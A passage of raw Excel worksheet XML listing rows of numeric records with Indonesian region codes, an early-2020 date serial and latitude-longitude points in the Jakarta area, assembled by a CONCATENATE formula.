      <c r="U508" s="5">
        <v>10690165</v>
      </c>
      <c r="V508" s="5" t="s">
        <v>14924</v>
      </c>
      <c r="W508" s="5">
        <v>-618743</v>
      </c>
      <c r="X508" t="s">
        <v>18733</v>
      </c>
      <c r="Y508" t="str">
        <f t="shared" si="7"/>
        <v>-6.18743,106.90165</v>
      </c>
    </row>
    <row r="509" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A509">
        <v>102231</v>
      </c>
      <c r="B509" s="1">
        <v>43868</v>
      </c>
      <c r="C509">
        <v>1</v>
      </c>
      <c r="D509" t="s">
        <v>22</v>
      </c>
      <c r="E509" t="s">
        <v>23</v>
      </c>
      <c r="F509" t="s">
        <v>2259</v>
      </c>
      <c r="H509" t="s">
        <v>26</v>
      </c>
      <c r="I509" t="s">
        <v>974</v>
      </c>
      <c r="J509" t="s">
        <v>138</v>
      </c>
      <c r="L509" t="s">
        <v>2260</v>
      </c>
      <c r="M509">
        <v>3172080005</v>
      </c>
      <c r="N509">
        <v>3172080</v>
      </c>
      <c r="O509">
        <v>3172</v>
      </c>
      <c r="P509">
        <v>31</v>
      </c>
      <c r="Q509" t="s">
        <v>140</v>
      </c>
      <c r="R509" t="s">
        <v>141</v>
      </c>
      <c r="S509" t="s">
        <v>49</v>
      </c>
      <c r="T509" t="s">
        <v>33</v>
      </c>
      <c r="U509" s="5">
        <v>10695032</v>
      </c>
      <c r="V509" s="5" t="s">
        <v>14925</v>
      </c>
      <c r="W509" s="5">
        <v>-617552</v>
      </c>
      <c r="X509" t="s">
        <v>18526</v>
      </c>
      <c r="Y509" t="str">
        <f t="shared" si="7"/>
        <v>-6.17552,106.95032</v>
      </c>
    </row>
    <row r="510" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A510">
        <v>102232</v>
      </c>
      <c r="B510" s="1">
        <v>43868</v>
      </c>
      <c r="C510">
        <v>1</v>
      </c>
      <c r="D510" t="s">
        <v>22</v>
      </c>
      <c r="E510" t="s">
        <v>23</v>
      </c>
      <c r="F510" t="s">
        <v>2261</v>
      </c>
      <c r="G510" t="s">
        <v>2262</v>
      </c>
      <c r="H510" t="s">
        <v>26</v>
      </c>
      <c r="I510" t="s">
        <v>523</v>
      </c>
      <c r="J510" t="s">
        <v>2263</v>
      </c>
      <c r="L510" t="s">
        <v>2264</v>
      </c>
      <c r="M510">
        <v>3171080001</v>
      </c>
      <c r="N510">
        <v>3171080</v>
      </c>
      <c r="O510">
        <v>3171</v>
      </c>
      <c r="P510">
        <v>31</v>
      </c>
      <c r="Q510" t="s">
        <v>2265</v>
      </c>
      <c r="R510" t="s">
        <v>1403</v>
      </c>
      <c r="S510" t="s">
        <v>108</v>
      </c>
      <c r="T510" t="s">
        <v>33</v>
      </c>
      <c r="U510" s="5">
        <v>10683275</v>
      </c>
      <c r="V510" s="5" t="s">
        <v>14926</v>
      </c>
      <c r="W510" s="5">
        <v>-626665</v>
      </c>
      <c r="X510" t="s">
        <v>18734</v>
      </c>
      <c r="Y510" t="str">
        <f t="shared" si="7"/>
        <v>-6.26665,106.83275</v>
      </c>
    </row>
    <row r="511" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A511">
        <v>102233</v>
      </c>
      <c r="B511" s="1">
        <v>43868</v>
      </c>
      <c r="C511">
        <v>1</v>
      </c>
      <c r="D511" t="s">
        <v>22</v>
      </c>
      <c r="E511" t="s">
        <v>23</v>
      </c>
      <c r="F511" t="s">
        <v>2266</v>
      </c>
      <c r="G511" t="s">
        <v>2267</v>
      </c>
      <c r="H511" t="s">
        <v>26</v>
      </c>
      <c r="I511" t="s">
        <v>1953</v>
      </c>
      <c r="J511" t="s">
        <v>2268</v>
      </c>
      <c r="L511" t="s">
        <v>2269</v>
      </c>
      <c r="M511">
        <v>3175030002</v>
      </c>
      <c r="N511">
        <v>3175030</v>
      </c>
      <c r="O511">
        <v>3175</v>
      </c>
      <c r="P511">
        <v>31</v>
      </c>
      <c r="Q511" t="s">
        <v>1592</v>
      </c>
      <c r="R511" t="s">
        <v>1563</v>
      </c>
      <c r="S511" t="s">
        <v>547</v>
      </c>
      <c r="T511" t="s">
        <v>33</v>
      </c>
      <c r="U511" s="5">
        <v>10686476</v>
      </c>
      <c r="V511" s="5" t="s">
        <v>14927</v>
      </c>
      <c r="W511" s="5">
        <v>-615617</v>
      </c>
      <c r="X511" t="s">
        <v>18735</v>
      </c>
      <c r="Y511" t="str">
        <f t="shared" si="7"/>
        <v>-6.15617,106.86476</v>
      </c>
    </row>
    <row r="512" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A512">
        <v>102234</v>
      </c>
      <c r="B512" s="1">
        <v>43868</v>
      </c>
      <c r="C512">
        <v>1</v>
      </c>
      <c r="D512" t="s">
        <v>22</v>
      </c>
      <c r="E512" t="s">
        <v>23</v>
      </c>
      <c r="F512" t="s">
        <v>2270</v>
      </c>
      <c r="H512" t="s">
        <v>26</v>
      </c>
      <c r="I512" t="s">
        <v>1359</v>
      </c>
      <c r="J512" t="s">
        <v>2197</v>
      </c>
      <c r="L512" t="s">
        <v>2271</v>
      </c>
      <c r="M512">
        <v>3175030002</v>
      </c>
      <c r="N512">
        <v>3175030</v>
      </c>
      <c r="O512">
        <v>3175</v>
      </c>
      <c r="P512">
        <v>31</v>
      </c>
      <c r="Q512" t="s">
        <v>1592</v>
      </c>
      <c r="R512" t="s">
        <v>1563</v>
      </c>
      <c r="S512" t="s">
        <v>547</v>
      </c>
      <c r="T512" t="s">
        <v>33</v>
      </c>
      <c r="U512" s="5">
        <v>10687737</v>
      </c>
      <c r="V512" s="5" t="s">
        <v>14928</v>
      </c>
      <c r="W512" s="5">
        <v>-615211</v>
      </c>
      <c r="X512" t="s">
        <v>18736</v>
      </c>
      <c r="Y512" t="str">
        <f t="shared" si="7"/>
        <v>-6.15211,106.87737</v>
      </c>
    </row>
    <row r="513" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A513">
        <v>102235</v>
      </c>
      <c r="B513" s="1">
        <v>43868</v>
      </c>
      <c r="C513">
        <v>1</v>
      </c>
      <c r="D513" t="s">
        <v>22</v>
      </c>
      <c r="E513" t="s">
        <v>23</v>
      </c>
      <c r="F513" t="s">
        <v>2272</v>
      </c>
      <c r="H513" t="s">
        <v>26</v>
      </c>
      <c r="I513" t="s">
        <v>1633</v>
      </c>
      <c r="J513" t="s">
        <v>1605</v>
      </c>
      <c r="L513" t="s">
        <v>2273</v>
      </c>
      <c r="M513">
        <v>3174040007</v>
      </c>
      <c r="N513">
        <v>3174040</v>
      </c>
      <c r="O513">
        <v>3174</v>
      </c>
      <c r="P513">
        <v>31</v>
      </c>
      <c r="Q513" t="s">
        <v>389</v>
      </c>
      <c r="R513" t="s">
        <v>377</v>
      </c>
      <c r="S513" t="s">
        <v>32</v>
      </c>
      <c r="T513" t="s">
        <v>33</v>
      </c>
      <c r="U513" s="5">
        <v>10678473</v>
      </c>
      <c r="V513" s="5" t="s">
        <v>14929</v>
      </c>
      <c r="W513" s="5">
        <v>-614667</v>
      </c>
      <c r="X513" t="s">
        <v>18737</v>
      </c>
      <c r="Y513" t="str">
        <f t="shared" si="7"/>
        <v>-6.14667,106.78473</v>
      </c>
    </row>
    <row r="514" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A514">
        <v>102236</v>
      </c>
      <c r="B514" s="1">
        <v>43868</v>
      </c>
      <c r="C514">
        <v>1</v>
      </c>
      <c r="D514" t="s">
        <v>22</v>
      </c>
      <c r="E514" t="s">
        <v>23</v>
      </c>
      <c r="F514" t="s">
        <v>2274</v>
      </c>
      <c r="G514" t="s">
        <v>2275</v>
      </c>
      <c r="H514" t="s">
        <v>26</v>
      </c>
      <c r="I514" t="s">
        <v>1624</v>
      </c>
      <c r="J514" t="s">
        <v>2276</v>
      </c>
      <c r="L514" t="s">
        <v>2277</v>
      </c>
      <c r="M514">
        <v>3175060001</v>
      </c>
      <c r="N514">
        <v>3175060</v>
      </c>
      <c r="O514">
        <v>3175</v>
      </c>
      <c r="P514">
        <v>31</v>
      </c>
      <c r="Q514" t="s">
        <v>2278</v>
      </c>
      <c r="R514" t="s">
        <v>2279</v>
      </c>
      <c r="S514" t="s">
        <v>547</v>
      </c>
      <c r="T514" t="s">
        <v>33</v>
      </c>
      <c r="U514" s="5">
        <v>10692729</v>
      </c>
      <c r="V514" s="5" t="s">
        <v>14930</v>
      </c>
      <c r="W514" s="5">
        <v>-615930</v>
      </c>
      <c r="X514" t="s">
        <v>18738</v>
      </c>
      <c r="Y514" t="str">
        <f t="shared" si="7"/>
        <v>-6.15930,106.92729</v>
      </c>
    </row>
    <row r="515" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A515">
        <v>102237</v>
      </c>
      <c r="B515" s="1">
        <v>43868</v>
      </c>
      <c r="C515">
        <v>1</v>
      </c>
      <c r="D515" t="s">
        <v>22</v>
      </c>
      <c r="E515" t="s">
        <v>23</v>
      </c>
      <c r="F515" t="s">
        <v>2280</v>
      </c>
      <c r="G515" t="s">
        <v>2281</v>
      </c>
      <c r="H515" t="s">
        <v>26</v>
      </c>
      <c r="I515" t="s">
        <v>517</v>
      </c>
      <c r="J515" t="s">
        <v>2282</v>
      </c>
      <c r="L515" t="s">
        <v>917</v>
      </c>
      <c r="M515">
        <v>3172090006</v>
      </c>
      <c r="N515">
        <v>3172090</v>
      </c>
      <c r="O515">
        <v>3172</v>
      </c>
      <c r="P515">
        <v>31</v>
      </c>
      <c r="Q515" t="s">
        <v>2283</v>
      </c>
      <c r="R515" t="s">
        <v>890</v>
      </c>
      <c r="S515" t="s">
        <v>49</v>
      </c>
      <c r="T515" t="s">
        <v>33</v>
      </c>
      <c r="U515" s="5">
        <v>10688570</v>
      </c>
      <c r="V515" s="5" t="s">
        <v>14931</v>
      </c>
      <c r="W515" s="5">
        <v>-617652</v>
      </c>
      <c r="X515" t="s">
        <v>18739</v>
      </c>
      <c r="Y515" t="str">
        <f t="shared" ref="Y515:Y578" si="8">CONCATENATE(X515,",",V515)</f>
        <v>-6.17652,106.88570</v>
      </c>
    </row>
    <row r="516" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A516">
        <v>102238</v>
      </c>
      <c r="B516" s="1">
        <v>43868</v>
      </c>
      <c r="C516">
        <v>1</v>
      </c>
      <c r="D516" t="s">
        <v>22</v>
      </c>
      <c r="E516" t="s">
        <v>23</v>
      </c>
      <c r="F516" t="s">
        <v>2284</v>
      </c>
      <c r="G516" t="s">
        <v>2285</v>
      </c>
      <c r="H516" t="s">
        <v>26</v>
      </c>
      <c r="I516" t="s">
        <v>2016</v>
      </c>
      <c r="J516" t="s">
        <v>586</v>
      </c>
      <c r="M516">
        <v>3173050002</v>
      </c>
      <c r="N516">
        <v>3173050</v>
      </c>
      <c r="O516">
        <v>3173</v>
      </c>
      <c r="P516">
        <v>31</v>
      </c>
      <c r="Q516" t="s">
        <v>588</v>
      </c>
      <c r="R516" t="s">
        <v>589</v>
      </c>
      <c r="S516" t="s">
        <v>62</v>
      </c>
      <c r="T516" t="s">
        <v>33</v>
      </c>
      <c r="U516" s="5">
        <v>10686500</v>
      </c>
      <c r="V516" s="5" t="s">
        <v>14568</v>
      </c>
      <c r="W516" s="5">
        <v>-617510</v>
      </c>
      <c r="X516" t="s">
        <v>18382</v>
      </c>
      <c r="Y516" t="str">
        <f t="shared" si="8"/>
        <v>-6.17510,106.86500</v>
      </c>
    </row>
    <row r="517" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A517">
        <v>102239</v>
      </c>
      <c r="B517" s="1">
        <v>43868</v>
      </c>
      <c r="C517">
        <v>1</v>
      </c>
      <c r="D517" t="s">
        <v>22</v>
      </c>
      <c r="E517" t="s">
        <v>23</v>
      </c>
      <c r="F517" t="s">
        <v>2286</v>
      </c>
      <c r="G517" t="s">
        <v>2287</v>
      </c>
      <c r="H517" t="s">
        <v>26</v>
      </c>
      <c r="I517" t="s">
        <v>1683</v>
      </c>
      <c r="J517" t="s">
        <v>1010</v>
      </c>
      <c r="L517" t="s">
        <v>2288</v>
      </c>
      <c r="M517">
        <v>3175050002</v>
      </c>
      <c r="N517">
        <v>3175050</v>
      </c>
      <c r="O517">
        <v>3175</v>
      </c>
      <c r="P517">
        <v>31</v>
      </c>
      <c r="Q517" t="s">
        <v>1012</v>
      </c>
      <c r="R517" t="s">
        <v>1013</v>
      </c>
      <c r="S517" t="s">
        <v>547</v>
      </c>
      <c r="T517" t="s">
        <v>33</v>
      </c>
      <c r="U517" s="5">
        <v>10690473</v>
      </c>
      <c r="V517" s="5" t="s">
        <v>14932</v>
      </c>
      <c r="W517" s="5">
        <v>-616952</v>
      </c>
      <c r="X517" t="s">
        <v>18740</v>
      </c>
      <c r="Y517" t="str">
        <f t="shared" si="8"/>
        <v>-6.16952,106.90473</v>
      </c>
    </row>
    <row r="518" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A518">
        <v>102240</v>
      </c>
      <c r="B518" s="1">
        <v>43868</v>
      </c>
      <c r="C518">
        <v>1</v>
      </c>
      <c r="D518" t="s">
        <v>22</v>
      </c>
      <c r="E518" t="s">
        <v>23</v>
      </c>
      <c r="F518" t="s">
        <v>2289</v>
      </c>
      <c r="H518" t="s">
        <v>26</v>
      </c>
      <c r="I518" t="s">
        <v>1633</v>
      </c>
      <c r="J518" t="s">
        <v>586</v>
      </c>
      <c r="L518" t="s">
        <v>2290</v>
      </c>
      <c r="M518">
        <v>3173050002</v>
      </c>
      <c r="N518">
        <v>3173050</v>
      </c>
      <c r="O518">
        <v>3173</v>
      </c>
      <c r="P518">
        <v>31</v>
      </c>
      <c r="Q518" t="s">
        <v>588</v>
      </c>
      <c r="R518" t="s">
        <v>589</v>
      </c>
      <c r="S518" t="s">
        <v>62</v>
      </c>
      <c r="T518" t="s">
        <v>33</v>
      </c>
      <c r="U518" s="5">
        <v>10686539</v>
      </c>
      <c r="V518" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W518" s="5">
        <v>-617605</v>
      </c>
      <c r="X518" t="s">
        <v>18379</v>
      </c>
      <c r="Y518" t="str">
        <f t="shared" si="8"/>
        <v>-6.17605,106.86539</v>
      </c>
    </row>
    <row r="519" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A519">
        <v>102241</v>
      </c>
      <c r="B519" s="1">
        <v>43868</v>
      </c>
      <c r="C519">
        <v>1</v>
      </c>
      <c r="D519" t="s">
        <v>22</v>
      </c>
      <c r="E519" t="s">
        <v>23</v>
      </c>
      <c r="F519" t="s">
        <v>2291</v>
      </c>
      <c r="G519" t="s">
        <v>2292</v>
      </c>
      <c r="H519" t="s">
        <v>26</v>
      </c>
      <c r="I519" t="s">
        <v>2293</v>
      </c>
      <c r="J519" t="s">
        <v>37</v>
      </c>
      <c r="M519">
        <v>3275060001</v>
      </c>
      <c r="N519">
        <v>3275060</v>
      </c>
      <c r="O519">
        <v>3275</v>
      </c>
      <c r="P519">
        <v>32</v>
      </c>
      <c r="Q519" t="s">
        <v>611</v>
      </c>
      <c r="R519" t="s">
        <v>114</v>
      </c>
      <c r="S519" t="s">
        <v>41</v>
      </c>
      <c r="T519" t="s">
        <v>42</v>
      </c>
      <c r="U519" s="5">
        <v>10695083</v>
      </c>
      <c r="V519" s="5" t="s">
        <v>14933</v>
      </c>
      <c r="W519" s="5">
        <v>-624745</v>
      </c>
      <c r="X519" t="s">
        <v>18741</v>
      </c>
      <c r="Y519" t="str">
        <f t="shared" si="8"/>
        <v>-6.24745,106.95083</v>
      </c>
    </row>
    <row r="520" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A520">
        <v>102242</v>
      </c>
      <c r="B520" s="1">
        <v>43868</v>
      </c>
      <c r="C520">
        <v>1</v>
      </c>
      <c r="D520" t="s">
        <v>22</v>
      </c>
      <c r="E520" t="s">
        <v>23</v>
      </c>
      <c r="F520" t="s">
        <v>2294</v>
      </c>
      <c r="G520" t="s">
        <v>2295</v>
      </c>
      <c r="H520" t="s">
        <v>26</v>
      </c>
      <c r="I520" t="s">
        <v>27</v>
      </c>
      <c r="J520" t="s">
        <v>2296</v>
      </c>
      <c r="L520" t="s">
        <v>2297</v>
      </c>
      <c r="M520">
        <v>3173060002</v>
      </c>
      <c r="N520">
        <v>3173060</v>
      </c>
      <c r="O520">
        <v>3173</v>
      </c>
      <c r="P520">
        <v>31</v>
      </c>
      <c r="Q520" t="s">
        <v>60</v>
      </c>
      <c r="R520" t="s">
        <v>61</v>
      </c>
      <c r="S520" t="s">
        <v>62</v>
      </c>
      <c r="T520" t="s">
        <v>33</v>
      </c>
      <c r="U520" s="5">
        <v>10686676</v>
      </c>
      <c r="V520" s="5" t="s">
        <v>14934</v>
      </c>
      <c r="W520" s="5">
        <v>-616774</v>
      </c>
      <c r="X520" t="s">
        <v>18742</v>
      </c>
      <c r="Y520" t="str">
        <f t="shared" si="8"/>
        <v>-6.16774,106.86676</v>
      </c>
    </row>
    <row r="521" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A521">
        <v>102243</v>
      </c>
      <c r="B521" s="1">
        <v>43868</v>
      </c>
      <c r="C521">
        <v>1</v>
      </c>
      <c r="D521" t="s">
        <v>22</v>
      </c>
      <c r="E521" t="s">
        <v>23</v>
      </c>
      <c r="F521" t="s">
        <v>2298</v>
      </c>
      <c r="G521" t="s">
        <v>2299</v>
      </c>
      <c r="H521" t="s">
        <v>26</v>
      </c>
      <c r="I521" t="s">
        <v>2300</v>
      </c>
      <c r="J521" t="s">
        <v>2301</v>
      </c>
      <c r="L521" t="s">
        <v>2302</v>
      </c>
      <c r="M521">
        <v>3172090007</v>
      </c>
      <c r="N521">
        <v>3172090</v>
      </c>
      <c r="O521">
        <v>3172</v>
      </c>
      <c r="P521">
        <v>31</v>
      </c>
      <c r="Q521" t="s">
        <v>890</v>
      </c>
      <c r="R521" t="s">
        <v>890</v>
      </c>
      <c r="S521" t="s">
        <v>49</v>
      </c>
      <c r="T521" t="s">
        <v>33</v>
      </c>
      <c r="U521" s="5">
        <v>10690322</v>
      </c>
      <c r="V521" s="5" t="s">
        <v>14935</v>
      </c>
      <c r="W521" s="5">
        <v>-617945</v>
      </c>
      <c r="X521" t="s">
        <v>18743</v>
      </c>
      <c r="Y521" t="str">
        <f t="shared" si="8"/>
        <v>-6.17945,106.90322</v>
      </c>
    </row>
    <row r="522" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A522">
        <v>102245</v>
      </c>
      <c r="B522" s="1">
        <v>43868</v>
      </c>
      <c r="C522">
        <v>1</v>
      </c>
      <c r="D522" t="s">
        <v>22</v>
      </c>
      <c r="E522" t="s">
        <v>23</v>
      </c>
      <c r="F522" t="s">
        <v>2303</v>
      </c>
      <c r="G522" t="s">
        <v>2304</v>
      </c>
      <c r="H522" t="s">
        <v>26</v>
      </c>
      <c r="I522" t="s">
        <v>1433</v>
      </c>
      <c r="J522" t="s">
        <v>2305</v>
      </c>
      <c r="L522" t="s">
        <v>2306</v>
      </c>
      <c r="M522">
        <v>3172080007</v>
      </c>
      <c r="N522">
        <v>3172080</v>
      </c>
      <c r="O522">
        <v>3172</v>
      </c>
      <c r="P522">
        <v>31</v>
      </c>
      <c r="Q522" t="s">
        <v>2307</v>
      </c>
      <c r="R522" t="s">
        <v>141</v>
      </c>
      <c r="S522" t="s">
        <v>49</v>
      </c>
      <c r="T522" t="s">
        <v>33</v>
      </c>
      <c r="U522" s="5">
        <v>10692349</v>
      </c>
      <c r="V522" s="5" t="s">
        <v>14936</v>
      </c>
      <c r="W522" s="5">
        <v>-617019</v>
      </c>
      <c r="X522" t="s">
        <v>18744</v>
      </c>
      <c r="Y522" t="str">
        <f t="shared" si="8"/>
        <v>-6.17019,106.92349</v>
      </c>
    </row>
    <row r="523" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A523">
        <v>102246</v>
      </c>
      <c r="B523" s="1">
        <v>43868</v>
      </c>
      <c r="C523">
        <v>1</v>
      </c>
      <c r="D523" t="s">
        <v>22</v>
      </c>
      <c r="E523" t="s">
        <v>23</v>
      </c>
      <c r="F523" t="s">
        <v>2308</v>
      </c>
      <c r="H523" t="s">
        <v>26</v>
      </c>
      <c r="I523" t="s">
        <v>1359</v>
      </c>
      <c r="J523" t="s">
        <v>37</v>
      </c>
      <c r="L523" t="s">
        <v>2309</v>
      </c>
      <c r="M523">
        <v>3275050003</v>
      </c>
      <c r="N523">
        <v>3275050</v>
      </c>
      <c r="O523">
        <v>3275</v>
      </c>
      <c r="P523">
        <v>32</v>
      </c>
      <c r="Q523" t="s">
        <v>2310</v>
      </c>
      <c r="R523" t="s">
        <v>955</v>
      </c>
      <c r="S523" t="s">
        <v>41</v>
      </c>
      <c r="T523" t="s">
        <v>42</v>
      </c>
      <c r="U523" s="5">
        <v>10698917</v>
      </c>
      <c r="V523" s="5" t="s">
        <v>14937</v>
      </c>
      <c r="W523" s="5">
        <v>-625405</v>
      </c>
      <c r="X523" t="s">
        <v>18745</v>
      </c>
      <c r="Y523" t="str">
        <f t="shared" si="8"/>
        <v>-6.25405,106.98917</v>
      </c>
    </row>
    <row r="524" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A524">
        <v>102247</v>
      </c>
      <c r="B524" s="1">
        <v>43868</v>
      </c>
      <c r="C524">
        <v>1</v>
      </c>
      <c r="D524" t="s">
        <v>22</v>
      </c>
      <c r="E524" t="s">
        <v>23</v>
      </c>
      <c r="F524" t="s">
        <v>2311</v>
      </c>
      <c r="H524" t="s">
        <v>26</v>
      </c>
      <c r="I524" t="s">
        <v>929</v>
      </c>
      <c r="J524" t="s">
        <v>2312</v>
      </c>
      <c r="L524" t="s">
        <v>2313</v>
      </c>
      <c r="M524">
        <v>3175050001</v>
      </c>
      <c r="N524">
        <v>3175050</v>
      </c>
      <c r="O524">
        <v>3175</v>
      </c>
      <c r="P524">
        <v>31</v>
      </c>
      <c r="Q524" t="s">
        <v>1037</v>
      </c>
      <c r="R524" t="s">
        <v>1013</v>
      </c>
      <c r="S524" t="s">
        <v>547</v>
      </c>
      <c r="T524" t="s">
        <v>33</v>
      </c>
      <c r="U524" s="5">
        <v>10688408</v>
      </c>
      <c r="V524" s="5" t="s">
        <v>14938</v>
      </c>
      <c r="W524" s="5">
        <v>-616380</v>
      </c>
      <c r="X524" t="s">
        <v>18324</v>
      </c>
      <c r="Y524" t="str">
        <f t="shared" si="8"/>
        <v>-6.16380,106.88408</v>
      </c>
    </row>
    <row r="525" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A525">
        <v>102248</v>
      </c>
      <c r="B525" s="1">
        <v>43868</v>
      </c>
      <c r="C525">
        <v>1</v>
      </c>
      <c r="D525" t="s">
        <v>22</v>
      </c>
      <c r="E525" t="s">
        <v>23</v>
      </c>
      <c r="F525" t="s">
        <v>2314</v>
      </c>
      <c r="G525" t="s">
        <v>2315</v>
      </c>
      <c r="H525" t="s">
        <v>26</v>
      </c>
      <c r="I525" t="s">
        <v>517</v>
      </c>
      <c r="J525" t="s">
        <v>2239</v>
      </c>
      <c r="L525" t="s">
        <v>2316</v>
      </c>
      <c r="M525">
        <v>3173060008</v>
      </c>
      <c r="N525">
        <v>3173060</v>
      </c>
      <c r="O525">
        <v>3173</v>
      </c>
      <c r="P525">
        <v>31</v>
      </c>
      <c r="Q525" t="s">
        <v>329</v>
      </c>
      <c r="R525" t="s">
        <v>61</v>
      </c>
      <c r="S525" t="s">
        <v>62</v>
      </c>
      <c r="T525" t="s">
        <v>33</v>
      </c>
      <c r="U525" s="5">
        <v>10684680</v>
      </c>
      <c r="V525" s="5" t="s">
        <v>14939</v>
      </c>
      <c r="W525" s="5">
        <v>-615703</v>
      </c>
      <c r="X525" t="s">
        <v>18746</v>
      </c>
      <c r="Y525" t="str">
        <f t="shared" si="8"/>
        <v>-6.15703,106.84680</v>
      </c>
    </row>
    <row r="526" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A526">
        <v>102249</v>
      </c>
      <c r="B526" s="1">
        <v>43868</v>
      </c>
      <c r="C526">
        <v>1</v>
      </c>
      <c r="D526" t="s">
        <v>22</v>
      </c>
      <c r="E526" t="s">
        <v>23</v>
      </c>
      <c r="F526" t="s">
        <v>2317</v>
      </c>
      <c r="G526" t="s">
        <v>2318</v>
      </c>
      <c r="H526" t="s">
        <v>26</v>
      </c>
      <c r="I526" t="s">
        <v>517</v>
      </c>
      <c r="J526" t="s">
        <v>2312</v>
      </c>
      <c r="L526" t="s">
        <v>2319</v>
      </c>
      <c r="M526">
        <v>3175050001</v>
      </c>
      <c r="N526">
        <v>3175050</v>
      </c>
      <c r="O526">
        <v>3175</v>
      </c>
      <c r="P526">
        <v>31</v>
      </c>
      <c r="Q526" t="s">
        <v>1037</v>
      </c>
      <c r="R526" t="s">
        <v>1013</v>
      </c>
      <c r="S526" t="s">
        <v>547</v>
      </c>
      <c r="T526" t="s">
        <v>33</v>
      </c>
      <c r="U526" s="5">
        <v>10688209</v>
      </c>
      <c r="V526" s="5" t="s">
        <v>14940</v>
      </c>
      <c r="W526" s="5">
        <v>-616447</v>
      </c>
      <c r="X526" t="s">
        <v>18747</v>
      </c>
      <c r="Y526" t="str">
        <f t="shared" si="8"/>
        <v>-6.16447,106.88209</v>
      </c>
    </row>
    <row r="527" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A527">
        <v>102250</v>
      </c>
      <c r="B527" s="1">
        <v>43868</v>
      </c>
      <c r="C527">
        <v>1</v>
      </c>
      <c r="D527" t="s">
        <v>22</v>
      </c>
      <c r="E527" t="s">
        <v>23</v>
      </c>
      <c r="F527" t="s">
        <v>2320</v>
      </c>
      <c r="G527" t="s">
        <v>2321</v>
      </c>
      <c r="H527" t="s">
        <v>26</v>
      </c>
      <c r="I527" t="s">
        <v>1359</v>
      </c>
      <c r="J527" t="s">
        <v>37</v>
      </c>
      <c r="M527">
        <v>3275010012</v>
      </c>
      <c r="N527">
        <v>3275010</v>
      </c>
      <c r="O527">
        <v>3275</v>
      </c>
      <c r="P527">
        <v>32</v>
      </c>
      <c r="Q527" t="s">
        <v>2322</v>
      </c>
      <c r="R527" t="s">
        <v>287</v>
      </c>
      <c r="S527" t="s">
        <v>41</v>
      </c>
      <c r="T527" t="s">
        <v>42</v>
      </c>
      <c r="U527" s="5">
        <v>10692673</v>
      </c>
      <c r="V527" s="5" t="s">
        <v>14941</v>
      </c>
      <c r="W527" s="5">
        <v>-626603</v>
      </c>
      <c r="X527" t="s">
        <v>18748</v>
      </c>
      <c r="Y527" t="str">
        <f t="shared" si="8"/>
        <v>-6.26603,106.92673</v>
      </c>
    </row>
    <row r="528" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A528">
        <v>102251</v>
      </c>
      <c r="B528" s="1">
        <v>43868</v>
      </c>
      <c r="C528">
        <v>1</v>
      </c>
      <c r="D528" t="s">
        <v>22</v>
      </c>
      <c r="E528" t="s">
        <v>23</v>
      </c>
      <c r="F528" t="s">
        <v>2323</v>
      </c>
      <c r="G528" t="s">
        <v>2324</v>
      </c>
      <c r="H528" t="s">
        <v>26</v>
      </c>
      <c r="I528" t="s">
        <v>1633</v>
      </c>
      <c r="J528" t="s">
        <v>59</v>
      </c>
      <c r="L528" t="s">
        <v>2325</v>
      </c>
      <c r="M528">
        <v>3173060002</v>
      </c>
      <c r="N528">
        <v>3173060</v>
      </c>
      <c r="O528">
        <v>3173</v>
      </c>
      <c r="P528">
        <v>31</v>
      </c>
      <c r="Q528" t="s">
        <v>60</v>
      </c>
      <c r="R528" t="s">
        <v>61</v>
      </c>
      <c r="S528" t="s">
        <v>62</v>
      </c>
      <c r="T528" t="s">
        <v>33</v>
      </c>
      <c r="U528" s="5">
        <v>10686080</v>
      </c>
      <c r="V528" s="5" t="s">
        <v>14942</v>
      </c>
      <c r="W528" s="5">
        <v>-616872</v>
      </c>
      <c r="X528" t="s">
        <v>18749</v>
      </c>
      <c r="Y528" t="str">
        <f t="shared" si="8"/>
        <v>-6.16872,106.86080</v>
      </c>
    </row>
    <row r="529" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A529">
        <v>102252</v>
      </c>
      <c r="B529" s="1">
        <v>43868</v>
      </c>
      <c r="C529">
        <v>1</v>
      </c>
      <c r="D529" t="s">
        <v>22</v>
      </c>
      <c r="E529" t="s">
        <v>23</v>
      </c>
      <c r="F529" t="s">
        <v>2326</v>
      </c>
      <c r="G529" t="s">
        <v>2327</v>
      </c>
      <c r="H529" t="s">
        <v>26</v>
      </c>
      <c r="I529" t="s">
        <v>137</v>
      </c>
      <c r="J529" t="s">
        <v>586</v>
      </c>
      <c r="L529" t="s">
        <v>2328</v>
      </c>
      <c r="M529">
        <v>3173050002</v>
      </c>
      <c r="N529">
        <v>3173050</v>
      </c>
      <c r="O529">
        <v>3173</v>
      </c>
      <c r="P529">
        <v>31</v>
      </c>
      <c r="Q529" t="s">
        <v>588</v>
      </c>
      <c r="R529" t="s">
        <v>589</v>
      </c>
      <c r="S529" t="s">
        <v>62</v>
      </c>
      <c r="T529" t="s">
        <v>33</v>
      </c>
      <c r="U529" s="5">
        <v>10686539</v>
      </c>
      <c r="V529" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W529" s="5">
        <v>-617469</v>
      </c>
      <c r="X529" t="s">
        <v>18368</v>
      </c>
      <c r="Y529" t="str">
        <f t="shared" si="8"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="530" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A530">
        <v>102253</v>
      </c>
      <c r="B530" s="1">
        <v>43868</v>
      </c>
      <c r="C530">
        <v>1</v>
      </c>
      <c r="D530" t="s">
        <v>22</v>
      </c>
      <c r="E530" t="s">
        <v>23</v>
      </c>
      <c r="F530" t="s">
